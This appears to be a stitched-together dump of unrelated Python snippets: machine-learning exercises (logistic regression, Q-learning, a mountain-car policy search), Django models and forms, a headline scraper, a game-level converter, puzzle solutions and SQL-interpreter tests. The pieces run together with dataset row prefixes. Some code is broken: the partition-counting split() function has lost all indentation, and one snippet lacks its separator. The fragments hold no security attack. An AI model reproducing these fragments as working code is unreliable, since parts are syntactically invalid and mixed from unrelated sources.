def predict(theta, X):
    """Map model probabilities to hard 0/1 labels at the 0.5 threshold."""
    probability = sigmoid(X * theta.T)
    return [1 if prob >= 0.5 else 0 for prob in probability]
def implement_for_LR(X_train, X_test, y_train, y_test,lamda=1):
    """Fit regularized logistic regression via fmin_tnc and print test accuracy.

    Bug fix: accuracy previously used `%` (modulo) instead of division, so the
    printed figure was the remainder of correct/total, not a percentage.
    """
    n = X_train.shape[1]
    # convert to numpy arrays and initalize the parameter array theta
    X_train = np.array(X_train.values)
    y_train = np.array(y_train.values)
    theta = np.zeros(n)
    result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg, args=(X_train, y_train, lamda))
    theta_min = np.matrix(result[0])
    predictions = predict(theta_min, X_test)
    correct = [1 if ((a == 1 and b == 1) or (a == 0 and b == 0)) else 0 for (a, b) in zip(predictions, y_test)]
    # Fraction correct expressed as a percentage.
    accuracy = sum(map(int, correct)) * 100.0 / len(correct)
    print('accuracy = {0}%'.format(accuracy))
def sumIntervals(input):
    """Total length covered by the union of [start, end) integer intervals.

    Returns 0 for an empty list, and 1 (sentinel, kept from the original)
    if any entry is malformed (wrong arity or start >= end).
    """
    if not input:
        return 0
    covered = set()
    for pair in input:
        if len(pair) != 2 or pair[0] >= pair[1]:
            return 1  # malformed-entry sentinel
        covered.update(range(pair[0], pair[1]))
    return len(covered)

sumIntervals([[1,2], [6, 10], [11, 15]])
|
# Read N integers (one per line), sort ascending, print one per line.
N = int(input())
values = [int(input()) for _ in range(N)]
values.sort()
print(*values, sep='\n')
6,348 | 618a8430d50aeca1c4b9c3fba975be342cc1893f | #!/usr/bin/python
# -*- coding: utf-8 -*-
#Title: Counting summations
import math
limit = 201                      # partition counts are computed for n in [0, limit)
comboList = dict()               # memo: "n min" -> split count
alphabet = range(1, limit)       # candidate summands
searchAlphabet = set(alphabet)   # NOTE(review): built but never used below
def concat(a, b):
    # Build the memoization key "a b".
    return "%i %i" % (a, b)
def split(n, min=1, tab=6):
if concat(n,min) in comboList.keys():
if tab == 6:
print " %sn = %i, min = %i, %i" % (" "*tab, n, min, concat(n, min))
return comboList[concat(n,min)]
if int(n) < int(min + 1):
return 1
splitSum = 0
splitList = []
for i in range(len(alphabet)):
if alphabet[i] > n/2:
break
if (n - alphabet[i]) in alphabet and not alphabet[i] < min:
splitSum += split(n - alphabet[i], alphabet[i], tab - 1)
comboList[concat(n,min)] = splitSum + 1
return splitSum + 1
#print split(99) -1
#print split(100) -1
# Print, for each i, the number of proper partitions (excluding "i itself").
splits = []
for i in range(limit):
    splits.append(split(i) - 1)
    print "%i: %i" % (i, splits[i])
|
6,349 | fabd3f233753f63d731a43c8b8b311e50d9deefe | # 217 is a prime number. In order 2017 to be a divisor of for sigma(a)=Product((p**(n+1)-1) // (p-1) for all divisors) it must be a power of a prime with (p**(a+1)-1) // (p-1) % 2017 == 0
# so we need only to check all such primes 'p' and count all k*p for k=1..N//p. We check p^n with n>=2 by brute force all primes. For n = 1 we generate all candidates by the formula p = k*2017-1 and check if it's a prime in a effective way.
# we also take care of duplicates when p'=k*p is not a qualified number if k is a qualified number itself.
from tools import *
from math import ceil
def sig(f):
    """Sigma (sum of divisors) from a factorization [(prime, exponent), ...]."""
    total = 1
    for prime, exponent in f:
        total *= (prime**(exponent + 1) - 1) // (prime - 1)
    return total
err = 1e-10
def calc(N, D):
    """Sum of all n <= N with D | sigma(n), found via qualified prime powers."""
    def check(n):
        # True iff D divides sigma(n).
        return not sig(factor(n)) % D
    cachePrimes(int(N**.5))
    def a2n(a):
        # NOTE(review): defined but never used below.
        return (a + 1) // D
    from math import log
    def genPrimeSigDivs(minA, maxA): # generate all primes and primes**k with sig % 2017 == 0
        if minA > maxA:
            return None
        maxE = int(ceil(log(maxA)/log(2)))
        for e in range(2, maxE): # for power >= 2 check all primes
            for p in primesN2M(ceil(minA**(1/e)-err), int(maxA**(1/e)+err)):
                if ((p**(e+1)-1) // (p-1)) % D == 0:
                    yield p, e
        for n in range(ceil((minA + 1)/D-err), (maxA+1)//D+1): # for power==1 check all 2017*k-1 for primality
            p = n * D - 1
            if isPrimeMillerRabin(p, 5):
                yield p, 1
    def excl(p, e, N=N):
        # Multiples counted under p**e that a larger qualified prime power
        # would double-count; returned as a set so they can be subtracted.
        a = p**e
        mem = set(range(0, N+1, a*p))
        for p2, e2 in genPrimeSigDivs(a+1, N//a):
            ex2 = excl(p2, e2, N//a)
            for a2 in range(0, N+1, a*p2**e2):
                k2 = a2//a
                if check(k2) and not k2 in ex2 and not a2 in mem:
                    mem.add(a2)
        return mem
    elapsed()
    resetTime()
    res = 0
    for p, e in genPrimeSigDivs(D-1, N): # walk though all qualified primes**e
        a = p**e
        k = N // a
        res += a*k*(k + 1) // 2 # sum of all qualified numbers
        res -= sum(excl(p, e))
        if a % 10000 == 1:
            elapsed((a, 1, N))
    return res
print(calc(10**11, 2017))
elapsed()
|
6,350 | 11337f6f9cf22ba6fbed68dfcb7a07fb6368e94e | # -*- coding: utf-8 -*-
from django.db import models
from backend.models.account import Account
from string import Template
# Shared template used by GroupParticipation.__str__.
out = Template("$account: $parts")

class Group(models.Model):
    name = models.CharField(max_length=100)

class GroupParticipation(models.Model):
    # An account's share ("parts") in a group.
    account = models.ForeignKey(Account, related_name='groups')
    parts = models.FloatField(default=1.0)
    group = models.ForeignKey(Group, related_name='participants')

    def __str__(self):
        return out.substitute(account=self.account, parts=self.parts)

    class Meta:
        unique_together = ('account', 'parts', 'group')
|
6,351 | 221b6ad6035276fb59addc4065c4ccee3f5a2d84 | from random import choice, random
from tabulate import tabulate
from Constants import *
from time import sleep
import numpy as np
import os
class QLearn():
    """Tabular Q-learning agent on a 10x10 grid with four move directions.

    Q-table keys are strings "{row}{column}{direction}". Terrain symbols
    (b, c, p, t, ...) and the Directions enum come from Constants
    (star-imported) — presumably b=start, t=target; confirm in Constants.
    """
    def __init__(self, alfa, gama, epsilon, epsilonDecay, epsilonMin, rewards, environment):
        self.alfa = alfa                 # learning rate
        self.gama = gama                 # discount factor
        self.epsilon = epsilon           # exploration probability
        self.epsilonDecay = epsilonDecay
        self.epsilonMin = epsilonMin
        self.rewards = rewards           # terrain symbol -> reward
        self.environment = environment   # 10x10 grid of terrain symbols
        self.previousState = {}          # Q-table snapshot from the previous sweep
        self.State = {}                  # Q-table being updated
    def initializeStates(self):
        # Zero-fill both Q-tables for every (row, column, direction) triple.
        for row in range(10):
            for column in range(10):
                for direction in Directions:
                    self.previousState[f"{row}{column}{direction.value}"] = 0
                    self.State[f"{row}{column}{direction.value}"] = 0
    def checkBoundaries(self, state, action):
        # Return (next position key, terrain symbol), clamping at the grid edge.
        row, column = int(state[0]) , int(state[1])
        if action == Directions.UP: return f"{max(row - 1, 0)}{column}", self.environment[max(row - 1,0)][column]
        elif action == Directions.RIGHT: return f"{row}{min(column + 1, 9)}", self.environment[row][min(column + 1, 9)]
        elif action == Directions.DOWN: return f"{min(row + 1, 9)}{column}", self.environment[min(row + 1, 9)][column]
        elif action == Directions.LEFT: return f"{row}{max(column - 1, 0)}", self.environment[row][max(column - 1, 0)]
    def reward(self, state, action):
        # Staying put (blocked by the edge) earns the reward for symbol c.
        futurePos, symbol = self.checkBoundaries(state, action)
        return self.rewards[c] if futurePos == state else self.rewards[symbol]
    def Q(self, state, action):
        # One-step Q update; symbols in [c, p, t] use their fixed reward
        # instead of the successor state's Q-values.
        futurePos, symbol = self.checkBoundaries(state, action)
        val = []
        if symbol in [c, p, t]:
            val.append(self.rewards[symbol])
        else:
            for direction in Directions:
                val.append(self.previousState[f"{futurePos}{direction.value}"])
        return self.previousState[f"{state}{action.value}"] + self.alfa * (self.reward(state, action) + self.gama * np.max(val) - self.previousState[f"{state}{action.value}"])
    def getInitialPosition(self):
        # Random cell among those marked with the start symbol b.
        pos = []
        for row in range(10):
            for column in range(10):
                if self.environment[row][column] == b:
                    pos.append((row,column))
        return choice(pos)
    def train(self, maxGen):
        """Run maxGen epsilon-greedy episodes of at most 200 steps each."""
        self.initializeStates()
        for generation in range(maxGen):
            if generation % 100 == 0: print(f"Geração {generation}/{maxGen}")
            initialPosAgent = self.getInitialPosition()
            state = f"{initialPosAgent[0]}{initialPosAgent[1]}"
            for o_0 in range(200):
                self.State[f"{state}{Directions.UP.value}"] = self.Q(state, Directions.UP)
                self.State[f"{state}{Directions.RIGHT.value}"] = self.Q(state, Directions.RIGHT)
                self.State[f"{state}{Directions.DOWN.value}"] = self.Q(state, Directions.DOWN)
                self.State[f"{state}{Directions.LEFT.value}"] = self.Q(state, Directions.LEFT)
                possibleActions = [
                    self.State[f"{state}{Directions.UP.value}"],
                    self.State[f"{state}{Directions.RIGHT.value}"],
                    self.State[f"{state}{Directions.DOWN.value}"],
                    self.State[f"{state}{Directions.LEFT.value}"]
                ]
                # Epsilon-greedy: explore with probability epsilon, else exploit.
                action = choice(list(Directions)) if random() < self.epsilon else Directions(np.argmax(possibleActions))
                state, o_0 = self.checkBoundaries(state, action)
            self.previousState = self.State.copy()
            self.epsilon *= self.epsilonDecay
            self.epsilon = max(self.epsilon, self.epsilonMin)
        print(f"Geração {maxGen}/{maxGen}")
    def exec(self, row , column):
        """Greedy rollout from (row, column), redrawing until the goal t is reached."""
        state = f"{row}{column}"
        self.draw((row,column))
        while (self.environment[row][column] != t):
            possibleActions = [
                self.State[f"{state}{Directions.UP.value}"],
                self.State[f"{state}{Directions.RIGHT.value}"],
                self.State[f"{state}{Directions.DOWN.value}"],
                self.State[f"{state}{Directions.LEFT.value}"]
            ]
            action = Directions(np.argmax(possibleActions))
            print(f"Direction: {symbolToUnicode[action.value]}")
            state, o_0 = self.checkBoundaries(state, action)
            row, column = int(state[0]), int(state[1])
            self.draw((row,column))
    def draw(self, carPosition):
        # Clear the terminal and render the grid with the agent at carPosition.
        sleep(0.4)
        os.system('cls' if os.name=='nt' else 'clear')
        table = []
        for row in range(10):
            col = []
            for column in range(10):
                if (row, column) == carPosition:
                    col.append("🛺")
                else:
                    col.append(symbolToUnicode[self.environment[row][column]])
            table.append(col)
        print(tabulate(table, [], tablefmt="fancy_grid"))
|
6,352 | df25b51010fdbcbf1a8949a7a755a3a982bbf648 | from django.db import models
from .data import REGISTER_TYPE_CHOICES
from .data import ENTRANCE_TYPE
from .data import EXPENSE_TYPE
class EstheticHouse(models.Model):
    """Cosmetics brand ("esthetic house") that products belong to."""
    name = models.CharField(
        verbose_name='nombre',
        max_length=512,
        unique=True,
    )
    def __str__(self):
        return self.name
    class Meta:
        ordering = ['name',]
        verbose_name = 'Casa Estética'
        verbose_name_plural = 'Casas Estéticas'
class Client(models.Model):
    """Customer record, keyed by national id document (cédula)."""
    name = models.CharField(
        max_length=255,
        verbose_name='nombre',
    )
    document = models.CharField(
        primary_key=True,
        max_length=30,
        verbose_name='cédula',
    )
    phone_number = models.CharField(
        max_length=10,
        verbose_name='celular'
    )
    email = models.CharField(
        max_length=255,
        verbose_name='correo electrónico',
        null=True,
    )
    birthday = models.DateField(
        verbose_name='Fecha de Cumpleaños',
        null=True,
    )
    def __str__(self):
        return self.name
    class Meta:
        ordering = ['name',]
        verbose_name = 'Cliente'
        verbose_name_plural = 'Clientes'
class Product(models.Model):
    """Inventory item; its code is the primary key."""
    code = models.CharField(
        primary_key=True,
        verbose_name='código',
        max_length=255,
        unique=True,
    )
    house = models.ForeignKey(
        'EstheticHouse',
        verbose_name='casa estética',
        null=True,
    )
    name = models.CharField(
        max_length=255,
        verbose_name='nombre',
        blank=True,
    )
    price = models.IntegerField(
        verbose_name='precio',
    )
    amount = models.IntegerField(
        verbose_name='cantidad',
    )
    @property
    def is_sold_out(self):
        # Out of stock when no units remain.
        return self.amount == 0
    def __str__(self):
        return self.name
    class Meta:
        ordering = ['name',]
        verbose_name = 'Producto'
        verbose_name_plural = 'Productos'
class Employee(models.Model):
    """Staff member, keyed by national id document (cédula)."""
    name = models.CharField(
        verbose_name='nombre',
        max_length=255,
    )
    document = models.CharField(
        primary_key=True,
        max_length=30,
        verbose_name='cédula',
    )
    phone_number = models.CharField(
        max_length=10,
        verbose_name='celular',
        null=True,
        blank=True,
    )
    def __str__(self):
        return self.name
    class Meta:
        ordering = ['name',]
        verbose_name = 'Empleado'
        verbose_name_plural = 'Empleados'
class Register(models.Model):
    """Cash-flow ledger entry: an income (entrance) or an expense record."""
    owner = models.ForeignKey(
        'Employee',
        verbose_name='propietario'
    )
    client = models.ForeignKey(
        'Client',
        verbose_name='cliente',
        null=True,
    )
    description = models.CharField(
        max_length=255,
        null=True,
        blank=True,
        verbose_name='descripción'
    )
    date = models.DateTimeField(
        auto_now_add=True,
        verbose_name='fecha',
    )
    value = models.IntegerField(
        verbose_name='valor',
    )
    register_type = models.PositiveSmallIntegerField(
        choices=REGISTER_TYPE_CHOICES,
        verbose_name='servicio',
    )
    is_pay_with_card = models.BooleanField(
        default=False,
        verbose_name='Fue pago con tarjeta de credito'
    )
    product_name = models.CharField(
        max_length=255,
        verbose_name='nombre del producto'
    )
    @property
    def is_entrance(self):
        # Income entry.
        return self.register_type == ENTRANCE_TYPE
    @property
    def is_expense(self):
        # Outgoing entry.
        return self.register_type == EXPENSE_TYPE
    def __str__(self):
        return 'Registro número {}'.format(
            self.id
        )
    class Meta:
        ordering = ['date',]
        verbose_name = 'Registro'
        verbose_name_plural = 'Registros'
|
6,353 | 107b09696ac671e689235da55aaf4c26ae7c321c | import scraperwiki
# NOTE(review): the same scrape-and-save routine appears three times verbatim
# below (a common artifact of re-running the ScraperWiki editor); deduplicate.
html = scraperwiki.scrape('http://www.denieuwereporter.nl/')
# scrape headlines from denieuwereporter - all h1 headings
import lxml.html
root = lxml.html.fromstring(html)
tds = root.cssselect('h1')
for h1 in tds:
    #print lxml.html.tostring(h1)
    print h1.text_content()
    record = {'h1': h1.text_content()}
    scraperwiki.sqlite.save(["h1"], record)
import scraperwiki
html = scraperwiki.scrape('http://www.denieuwereporter.nl/')
# scrape headlines from denieuwereporter - all h1 headings
import lxml.html
root = lxml.html.fromstring(html)
tds = root.cssselect('h1')
for h1 in tds:
    #print lxml.html.tostring(h1)
    print h1.text_content()
    record = {'h1': h1.text_content()}
    scraperwiki.sqlite.save(["h1"], record)
import scraperwiki
html = scraperwiki.scrape('http://www.denieuwereporter.nl/')
# scrape headlines from denieuwereporter - all h1 headings
import lxml.html
root = lxml.html.fromstring(html)
tds = root.cssselect('h1')
for h1 in tds:
    #print lxml.html.tostring(h1)
    print h1.text_content()
    record = {'h1': h1.text_content()}
    scraperwiki.sqlite.save(["h1"], record)
6,354 | fe1cc7660396071172c1ec65ba685e677e497646 | # TODO - let user input file name on command line
level_file = 'level.txt'
# read characters in level.txt into
# terrain map
# which is array of columns
f = open(level_file)
terrain_map = []
for row in f:
    col_index = 0
    row_index = 0  # NOTE(review): incremented per tile but never read
    for tile in row.rstrip():
        # Grow the list of columns while scanning the first row.
        if col_index == len(terrain_map):
            terrain_map.append([])
        terrain_map[col_index].append(tile)
        col_index += 1
        row_index += 1
f.close()
# print(terrain_map)
def map_tile_char_to_terrain(tile):
    """Translate a level-file character into its terrain texture name."""
    lookup = {
        'M': "dirt",
        'R': "rock",
        'D': "data",
        'B': "empty",
        'P': "solar",
    }
    # Unknown characters default to plain dirt.
    return lookup.get(tile, "dirt")
def output_terrain_column(column):
    # Emit one terrain column as a JSON-ish array of {"tex": <terrain>} objects.
    n = len(column)
    print('[')
    for i, tile in enumerate(column):
        print(' {')
        print('  "tex": "' + map_tile_char_to_terrain(tile) + '"')
        # Comma after every object except the last.
        if i + 1 < n:
            print(' },')
        else:
            print(' }')
    print(']')
def print_entities():
    # Emit the fixed "entities" JSON fragment (Python 2 print statement).
    print """\
"entities": [
    {
        "x": 0,
        "y": 0,
        "rot": 0,
        "tex": "rover",
        "name": "rover",
        "inherits": {
            "Accessible": [
                "Bots"
            ],
            "Rover": {
                "moveSFX": "move"
            }
        }
    }
],
"""
def print_footer():
    # Emit the texture/sfx/meta tail of the level JSON.
    # TODO add other textures
    print """
"tex": {
    "rover": "/images/rover.png",
    "dirt": "/images/mars.png",
    "rock": "/images/mars_rock.png",
    "blank": "/images/blank.png",
    "solar": "/images/panel.png",
    "data": "/images/data_drive.png"
},
"sfx": {
    "botMove": "/audio/"
},
"meta": {
    "title": "Getting started",
    "desc": "Learn the basics of javascript and how to control a bot"
}
"""
# output terrain map by columns
print("{")
print(' "tests": [')
print(' {')
print_entities()
print(' "terrain": [')
num_cols = len(terrain_map)
for i, column in enumerate(terrain_map):
    output_terrain_column(column)
    # Comma between columns, none after the last.
    if i + 1 < num_cols:
        print(',')
print(' ]')
print(' }')
print(' ]')
print(',')
print_footer()
print("}")
def chessKnight(cell):
    """Number of legal knight moves from a square like "a1" on an 8x8 board."""
    files = "abcdefgh"
    moves = 8
    idx = files.find(cell[0])
    if idx == -1:
        # Unrecognised file letter: keep the original fallback of 8.
        return moves
    rank = int(cell[1])
    near_edge_4 = rank in (1, 8)   # on the top/bottom rank: lose 4 moves
    near_edge_2 = rank in (2, 7)   # one square in: lose 2 moves
    if near_edge_4:
        moves -= 4
    elif near_edge_2:
        moves -= 2
    if idx in (0, 7):
        # a/h file: further reduction depends on how close to the corner we are.
        if near_edge_4:
            moves -= 2
        elif near_edge_2:
            moves -= 3
        else:
            moves -= 4
    elif idx in (1, 6):
        # b/g file.
        moves -= 1 if near_edge_4 else 2
    return moves
|
6,356 | 63ee25791177ead5389c14990ce6da3e2c11b683 | import gym
import os
import sys
import numpy as np
import theano
import theano.tensor as T
import matplotlib.pyplot as plt
from gym import wrappers
from datetime import datetime
from mountain_car_v1_q_learning import Transformer
# so you can test different architectures
class Layer:
    """One dense theano layer: He-style init, optional bias, activation f."""
    def __init__(self, m1, m2, f=T.nnet.relu, use_bias=True, zeros=False):
        if zeros:
            w = np.zeros((m1, m2))
        else:
            # He initialization, suited to ReLU-style activations.
            w = np.random.randn(m1, m2) * np.sqrt(2 / m1)
        self.w = theano.shared(w)
        self.params = [self.w]
        self.use_bias = use_bias
        if use_bias:
            self.b = theano.shared(np.zeros(m2))
            self.params += [self.b]
        self.f = f
    def forward(self, x):
        # Affine transform (bias optional) followed by the activation.
        if self.use_bias:
            a = x.dot(self.w) + self.b
        else:
            a = x.dot(self.w)
        return self.f(a)
# approximates pi(a | s)
class Policy:
    """Gaussian policy pi(a|s): separate theano networks model mean and variance.

    Fixes over the original:
      * the variance network's hidden-layer loop assigned ``M1``/``M2`` but
        built every layer from the mean loop's leftover ``m1``/``m2``, so
        hidden variance layers got the wrong dimensions;
      * ``copy()`` passed ``layer_sizes_mean`` twice, so clones of a policy
        with a non-empty variance network had the wrong architecture.
    """
    def __init__(self, ft, D, layer_sizes_mean=[], layer_sizes_var=[]):
        # save inputs for copy
        self.ft = ft
        self.D = D
        self.layer_sizes_mean = layer_sizes_mean
        self.layer_sizes_var = layer_sizes_var
        ##### model the mean #####
        self.mean_layers = []
        m1 = D
        for m2 in layer_sizes_mean:
            layer = Layer(m1, m2)
            self.mean_layers.append(layer)
            m1 = m2
        # final layer: linear output, zero-initialized
        layer = Layer(m1, 1, lambda x: x, use_bias=False, zeros=True)
        self.mean_layers.append(layer)
        ##### model the variance #####
        self.var_layers = []
        m1 = D  # bug fix: restart the layer chaining from the input dimension
        for m2 in layer_sizes_var:
            layer = Layer(m1, m2)
            self.var_layers.append(layer)
            m1 = m2
        # final layer: softplus keeps the variance positive
        layer = Layer(m1, 1, T.nnet.softplus, use_bias=False, zeros=False)
        self.var_layers.append(layer)
        # get all params for gradient
        params = []
        for layer in (self.mean_layers + self.var_layers):
            params += layer.params
        self.params = params
        # inputs and targets
        x = T.matrix('x')
        actions = T.vector('actions')
        advantages = T.vector('advantages')
        # calculate output and cost
        def get_output(layers):
            z = x
            for layer in layers:
                z = layer.forward(z)
            return z.flatten()
        mean = get_output(self.mean_layers)
        var = get_output(self.var_layers) + 1e-4 # smoothing
        self.predict_ = theano.function(
            inputs=[x],
            outputs=[mean, var],
            allow_input_downcast=True
        )
    def predict(self, x):
        """Return (mean, var) arrays for the feature-transformed states x."""
        x = np.atleast_2d(x)
        x = self.ft.transform(x)
        return self.predict_(x)
    def sample_action(self, x):
        """Sample a ~ N(mean(x), var(x)), clipped to the [-1, 1] action range."""
        pred = self.predict(x)
        mu = pred[0][0]
        v = pred[1][0]
        a = np.random.randn()*np.sqrt(v) + mu
        return min(max(a, -1), 1)
    def copy(self):
        """Return a new Policy with identical architecture and parameters."""
        # bug fix: the variance sizes were previously passed as the mean sizes
        clone = Policy(self.ft, self.D, self.layer_sizes_mean, self.layer_sizes_var)
        clone.copy_from(self)
        return clone
    def copy_from(self, other):
        # self is being copied from other
        for p, q in zip(self.params, other.params):
            v = q.get_value()
            p.set_value(v)
    def perturb_params(self):
        """Add scaled Gaussian noise to each parameter (10% chance: re-randomize)."""
        for p in self.params:
            v = p.get_value()
            noise = np.random.randn(*v.shape) / np.sqrt(v.shape[0]) * 5.0
            if np.random.random() < 0.1:
                # with probability 0.1 start completely from scratch
                p.set_value(noise)
            else:
                p.set_value(v + noise)
def episode(env, policy, gamma):
    """Play one episode (capped at 2000 steps) and return the total reward."""
    # NOTE(review): gamma is accepted but unused here — confirm intended.
    observation = env.reset()
    done = False
    total_reward = 0
    iterations = 0
    while not done and iterations < 2000:
        # if we reach 2000, just quit, don't want this going forever
        # the 200 limit seems a bit early
        action = policy.sample_action(observation)
        # oddly, the mountain car environment requires the action to be in
        # an object where the actual action is stored in object[0]
        observation, reward, done, info = env.step([action])
        total_reward += reward
        iterations += 1
    return total_reward
def series(env, T, policy, gamma, print_iters=False):
    """Run T episodes and return the mean total reward (also printed)."""
    rewards = np.empty(T)
    for idx in range(T):
        rewards[idx] = episode(env, policy, gamma)
        if print_iters:
            print(idx, "Average so far:", rewards[:idx + 1].mean())
    mean_reward = rewards.mean()
    print("Average total rewards:", mean_reward)
    return mean_reward
def random_search(env, policy, gamma):
    """Hill-climb in parameter space: keep each perturbed copy that scores better.

    Returns (per-candidate average rewards, best policy found).
    """
    total_rewards = []
    best_avg_totalreward = float('-inf')
    best_policy = policy
    num_episodes_per_param_test = 3
    for t in range(100):
        tmp_model = best_policy.copy()
        tmp_model.perturb_params()
        avg_totalrewards = series(
            env,
            num_episodes_per_param_test,
            tmp_model,
            gamma
        )
        total_rewards.append(avg_totalrewards)
        if avg_totalrewards > best_avg_totalreward:
            best_policy = tmp_model
            best_avg_totalreward = avg_totalrewards
    return total_rewards, best_policy
def main():
    """Train via random search on MountainCarContinuous-v0 and report results."""
    env = gym.make('MountainCarContinuous-v0')
    ft = Transformer(env, n_components=100)
    D = ft.dimensions
    model = Policy(ft, D, [], [])
    gamma = 0.99
    # Optional: `python <script> monitor` records videos/stats to a new dir.
    if 'monitor' in sys.argv:
        filename = os.path.basename(__file__).split('.')[0]
        monitor_dir = './' + filename + '_' + str(datetime.now())
        env = wrappers.Monitor(env, monitor_dir)
    total_rewards, model = random_search(env, model, gamma)
    print("max reward:", np.max(total_rewards))
    # play 100 episodes and check the average
    avg_totalrewards = series(env, 100, model, gamma, print_iters=True)
    print("avg reward over 100 episodes with best models:", avg_totalrewards)
    plt.plot(total_rewards)
    plt.title("Rewards")
    plt.show()

if __name__ == '__main__':
    main()
6,357 | b3ee76bc0d93135d0908044a2424dd927a390007 | import os
from sql_interpreter.tables.csv_table import CsvTable
from sql_interpreter.interpreter import SqlInterpreter
from sql_interpreter.cli import Cli
class InterpreterTest():
    """Manual smoke-test harness for SqlInterpreter backed by two CSV tables."""
    def setUp(self):
        # Fresh interpreter + CLI with employees and departments loaded.
        self.interpreter = SqlInterpreter()
        self.cli = Cli(self.interpreter)
        filename = os.path.join(
            os.path.dirname(__file__), 'resources/employees.csv')
        self.interpreter.load(CsvTable('employees', filename))
        filename = os.path.join(
            os.path.dirname(__file__), 'resources/departments.csv')
        self.interpreter.load(CsvTable('departments', filename))
    def tearDown(self):
        self.interpreter.unload_all()
    def test_select_1(self):
        # Projection with a concatenation alias and column arithmetic.
        sql = '''select
        id, first_name || ' ' || last_name as full_name, salary - 1000
        from employees;'''
        self.cli.execute(sql)
        self.cli.print_new_line()
    def test_select_2(self):
        # Cross join of the two tables, using a table alias.
        sql = '''select
        e.id, last_name, department_id, departments.id, name
        from employees e, departments;'''
        self.cli.execute(sql)
        self.cli.print_new_line()
    def test_select_all(self):
        # NOTE(review): uses interpreter.interpret directly (not cli.execute)
        # and is not invoked from the __main__ runner — confirm intended.
        code = '''select * from employees;'''
        self.interpreter.interpret(code)
        self.cli.print_new_line()
    def test_select_distinct(self):
        # DISTINCT with aliases and a two-key ORDER BY (desc on the second key).
        sql = '''select distinct
        departments.id as dep_id, employees.salary as sal
        from employees, departments
        order by dep_id, sal desc;'''
        self.cli.execute(sql)
        self.cli.print_new_line()
if __name__ == '__main__':
    # NOTE(review): test_select_all is defined on the class but not run here.
    suite = InterpreterTest()
    suite.setUp()
    for case in (suite.test_select_1, suite.test_select_2, suite.test_select_distinct):
        case()
    suite.tearDown()
|
6,358 | 8cd50e1f0e0feb4d753443220f9fa9065e80e0ef | from concurrent.futures import ProcessPoolExecutor
from nltk import PorterStemmer, RegexpTokenizer
from stop_words import get_stop_words
class Preprocessor(object):
    """Tokenize, stop-word-filter and Porter-stem documents.

    process_docs() distributes the work over a process pool of
    ``max_workers`` workers.
    """

    def __init__(self, max_workers=4):
        self.max_workers = max_workers  # size of the process pool
        self.tokenizer = RegexpTokenizer(r"\w+")
        self.en_stopwords = set(get_stop_words("en"))
        self.p_stemmer = PorterStemmer()

    def preprocess_doc(self, doc):
        """Return the lower-cased, stop-word-free, stemmed tokens of *doc*."""
        tokens = self.tokenizer.tokenize(doc.lower())
        stopped_tokens = [t for t in tokens if t not in self.en_stopwords]
        return [self.p_stemmer.stem(t) for t in stopped_tokens]

    def process_docs(self, doc_list):
        """Preprocess every document in *doc_list* (order preserved).

        Bug fix: the original created a ProcessPoolExecutor but never
        submitted any work to it, so everything ran serially in the parent
        process.  The pool is now actually used via executor.map().
        """
        with ProcessPoolExecutor(max_workers=self.max_workers) as executor:
            return list(executor.map(self.preprocess_doc, doc_list))

    def preprocess_doc_with_url(self, doc_with_url):
        """Preprocess a (url, content) pair, keeping the url attached.

        (The original opened an unused ProcessPoolExecutor per call; removed.)
        """
        url, content = doc_with_url
        return url, self.preprocess_doc(content)

    def process_docs_with_urls(self, urldoc_list):
        """Preprocess a list of (url, content) pairs."""
        return [self.preprocess_doc_with_url(urldoc) for urldoc in urldoc_list]
class WithUrlPreprocessor(Preprocessor):
    """Preprocessor variant whose documents arrive as (url, content) pairs."""

    def __init__(self, max_workers=4):
        super().__init__(max_workers=max_workers)

    def preprocess_doc(self, doc):
        """Preprocess only the content half of a (url, content) pair."""
        _url, content = doc
        return super().preprocess_doc(content)
|
6,359 | 548a236c4c485091d312593dcb0fa331ff98f1a8 | import sys
import os
import utils
def run(name, dim_k, dump='dump', add_cmd=''):
    """Build and execute the main.py evaluation command for one stored result.

    Blocks on input() if the command exits non-zero so the failure is noticed.
    """
    checkpoint = all_res[name]
    # the second underscore-separated token of the checkpoint encodes the model family
    if checkpoint.split('_')[1] == 'att':
        model = 'ATT_ts'
    else:
        model = 'LastItem'
    cmd = f'python main.py -model={model} -ds=v3 -restore_model={checkpoint} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'
    print(cmd)
    if os.system(cmd) != 0:
        input('Error!!!!!!')
# Registry of evaluable runs; each name maps to its restore-model id
# (identical strings in this setup).
all_res = {key: key for key in ('id_att_3', 'id_last', 'c_att_5', 'c_last')}
def main():
    """Evaluate each stored checkpoint twice: first normally, then with
    -skip_vali so the dump covers everything."""
    configs = [
        ('id_att_3', 1024, ''),
        ('id_last', 1024, ''),
        ('c_att_5', 256, '-seq_length=5'),
        ('c_last', 256, ''),
    ]
    for name, k, extra in configs:
        run(name, k, dump='dump', add_cmd=extra)
    for name, k, extra in configs:
        flags = '-skip_vali' if not extra else '-skip_vali ' + extra
        run(name, k, dump='dump_all', add_cmd=flags)


if __name__ == '__main__':
    main()
6,360 | 5215b5e4efe2e126f18b3c4457dc3e3902923d49 | from django import forms
from django.forms import inlineformset_factory
from django.utils.translation import ugettext, ugettext_lazy as _
from django.contrib.auth.models import User
from django.conf import settings
from django.db.models import Max
from auction.models import *
from datetime import *
from decimal import *
import re
class UserForm(forms.ModelForm):
    """Registration/edit form for Django's built-in User.

    The email address doubles as the username; the password is validated
    for minimum length and stored hashed.
    """

    error_email = {
        # fixed typo: "allready" -> "already"
        'email_exist': _("Email already exist."),
    }
    error_password = {
        'password_less': _("Password should be more than 6 characters."),
    }
    password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)

    class Meta:
        model = User
        fields = ('first_name', 'last_name', 'email')

    def __init__(self, *args, **kwargs):
        super(UserForm, self).__init__(*args, **kwargs)
        self.fields['email'].required = True
        # apply Bootstrap styling to every field
        for field_name in self.fields:
            field = self.fields.get(field_name)
            if field:
                field.widget.attrs.update({'class': 'form-control input-lg',
                                           'placeholder': field.label,
                                           'autocomplete': 'off'})

    def clean_email(self):
        """Reject addresses already used by a *different* account."""
        email = self.cleaned_data.get("email")
        if self.instance.email == email:
            return email
        # .exists() avoids fetching all matching rows just to count them
        if User.objects.filter(email=email).exists():
            raise forms.ValidationError(
                _("This email address is already in use. Please supply a different email address."))
        return email

    def clean_password(self):
        """Require at least 6 characters; tolerate a missing/empty value
        (the original crashed with TypeError on len(None))."""
        password = self.cleaned_data.get("password")
        if not password or len(password) < 6:
            raise forms.ValidationError(
                _("Password should be more than 6 characters."))
        return password

    def save(self, commit=True):
        """Persist with username mirrored from the email and a hashed password."""
